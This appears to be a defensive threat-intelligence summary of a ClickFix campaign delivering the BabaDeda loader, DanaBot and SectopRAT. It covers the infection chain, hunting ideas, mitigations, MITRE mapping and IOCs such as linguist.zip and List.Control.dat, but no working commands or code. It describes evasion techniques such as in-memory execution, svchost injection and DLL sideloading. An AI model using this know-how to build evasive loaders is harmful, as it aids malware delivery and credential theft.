What Is the BabaDeda Loader? Analysis of a New ClickFix Malware Campaign
Morphisec researchers identified a significantly evolved version of the BabaDeda loader targeting the education and financial sectors. The campaign leverages ClickFix social engineering to trick users into executing PowerShell commands, leading to a complex, multi-stage infection chain involving DLL sideloading, in-memory execution, and external payload storage to deliver DanaBot and SectopRAT.
- filenamelinguist.zipDisguised package containing roughly 30 files used to facilitate DLL sideloading.
- filenameList.Control.datExternal payload storage file used by the loader to hide malicious bytes until runtime.
Detection / HunterGoogle
What Happened
Cybersecurity researchers have discovered a new version of a malicious program called BabaDeda targeting schools and banks. The attack starts with a fake security check or CAPTCHA that tricks people into copying and pasting a hidden command into their computer. Once run, the malware secretly downloads and hides its components, eventually stealing passwords and giving attackers remote control of the system. Because the malware hides its true nature until the last possible second, traditional antivirus tools struggle to catch it. Organizations should focus on preventing unauthorized code from running in the first place and educate users about fake browser prompts.
Key Takeaways
- A new, highly evasive version of the BabaDeda loader was observed targeting education and financial organizations.
- The attack initiates via ClickFix social engineering, tricking users into executing malicious PowerShell commands via fake CAPTCHA prompts.
- The loader utilizes modular staging, external payload storage (e.g., List.Control.dat), and in-memory execution to evade file-based detection.
- Payloads are injected into trusted processes like svchost.exe and include DanaBot and SectopRAT.
- The malware includes environmental checks to avoid executing on Russian or Belarusian systems.
Affected Systems
- Windows operating systems
- Education and financial sector organizations
Attack Chain
The attack begins with a ClickFix social engineering lure, presenting a fake CAPTCHA that tricks the victim into executing a PowerShell command. This command runs a script in memory, launching a hidden PowerShell process that downloads subsequent payloads over plain HTTP. The loader performs locale checks, avoiding execution in Russia and Belarus, before downloading a disguised package (linguist.zip) and injecting code into svchost.exe. Finally, it uses DLL sideloading to read an XOR-encoded payload from an external file (List.Control.dat) and executes the final payload (DanaBot or SectopRAT) in memory via legitimate Windows callback functions.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules inline, but mentions that a full technical breakdown with IOCs is available in an attached PDF report.
Detection Engineering Assessment
EDR Visibility: Medium — The malware uses in-memory execution, DLL sideloading, and legitimate Windows callbacks to evade traditional file-based detection, though EDRs with strong memory scanning and process injection telemetry may detect the svchost.exe injection. Network Visibility: Medium — Payloads are pulled over plain HTTP, which provides cleartext visibility, but the initial access relies on user interaction with a web prompt. Detection Difficulty: Hard — The modular nature, external payload storage, and in-memory execution via callbacks make it difficult to detect using static signatures or standard behavioral rules.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Network Connections (Sysmon 3)
- Image Loaded (Sysmon 7)
- Process Access (Sysmon 10)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for suspicious PowerShell execution originating from web browsers or unusual parent processes, indicating potential ClickFix exploitation. | Process Creation | Execution | Medium |
| Look for unexpected DLL loads or process injection targeting svchost.exe, especially if the injecting process is a recently downloaded or unknown executable. | Process Access / Image Loaded | Defense Evasion | Low |
Control Gaps
- File-based Antivirus
- Static Signature Detection
Key Behavioral Indicators
- PowerShell executing hidden commands after browser interaction
- svchost.exe being injected into by non-system processes
- Presence of linguist.zip or List.Control.dat in user directories
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider searching endpoint telemetry for the presence of 'linguist.zip' or 'List.Control.dat'.
- Evaluate whether network logs show unusual plain HTTP downloads originating from PowerShell.
Infrastructure Hardening
- If supported by your environment, consider implementing application control to restrict the execution of unknown binaries and scripts.
- Evaluate network filtering rules to block or inspect plain HTTP traffic for suspicious payload downloads.
User Protection
- Consider deploying endpoint protection that includes memory scanning and behavioral analysis to detect process injection.
- If applicable, restrict PowerShell execution policies for standard users.
Security Awareness
- Consider updating security awareness training to include the 'ClickFix' technique, specifically warning users about fake CAPTCHA or verification prompts that ask them to copy and paste commands.
MITRE ATT&CK Mapping
- T1566.002 - Phishing: Spearphishing Link
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1055 - Process Injection
- T1574.002 - Hijack Execution Flow: DLL Side-Loading
- T1620 - Reflective Code Loading
- T1140 - Deobfuscate/Decode Files or Information
- T1614.001 - System Location Discovery: System Language Discovery
Additional IOCs
- Command Lines:
- Purpose: Initial execution via ClickFix social engineering lure | Tools:
PowerShell| Stage: Initial Access
- Purpose: Initial execution via ClickFix social engineering lure | Tools:
- Other:
0xBABADEDA- Internal constant embedded in the loader's code for its task handler.
